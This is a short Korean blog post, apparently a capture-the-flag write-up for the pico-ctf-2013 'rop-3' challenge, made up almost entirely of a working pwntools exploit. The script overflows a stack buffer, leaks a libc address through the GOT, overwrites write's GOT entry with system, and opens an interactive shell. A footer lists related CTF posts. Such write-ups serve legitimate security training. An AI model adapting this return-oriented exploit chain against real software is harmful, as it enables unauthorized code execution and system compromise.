rop1,2와 동일하게 품


exploit code

?
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
from pwn import *
  
p = process('./rop3-7f3312fe43c46d26')
  
read_plt = 0x8048360
read_got = 0x804a000
write_plt = 0x80483a0
write_got = 0x804a010
bss = 0x804a020
system_offset = 0x9ad60
pppr = 0x804855d
pr = 0x8048344
binsh = "/bin/sh"
  
payload = "A"*140
payload += p32(write_plt)
payload += p32(pppr)
payload += p32(1)
payload += p32(read_got)
payload += p32(4)
  
payload += p32(read_plt)
payload += p32(pppr)
payload += p32(0)
payload += p32(bss)
payload += p32(len(binsh)+1)
  
payload += p32(read_plt)
payload += p32(pppr)
payload += p32(0)
payload += p32(write_got)
payload += p32(4)
  
payload += p32(write_plt)
payload += p32(pr)
payload += p32(bss)
  
log.info("Exploit..")
p.sendline(payload)
  
read_addr = u32(p.recv()[-4:])
log.info("read_addr = {}".format(hex(read_addr)))
system_addr = read_addr - system_offset
log.info("system_addr = {}".format(hex(system_addr)))
  
p.sendline(binsh)
p.sendline(p32(system_addr))
p.interactive()

'CTF' 카테고리의 다른 글

CodeGate 2017 babypwn  (1) 2018.07.18
pico-ctf-2013 rop-4  (0) 2018.07.17
pico-ctf-2013 rop-2  (0) 2018.07.14
pico-ctf-2013 rop-1  (0) 2018.07.14
PlaidCTF 2013 ropasaurusrex  (0) 2018.07.14

+ Recent posts

티스토리툴바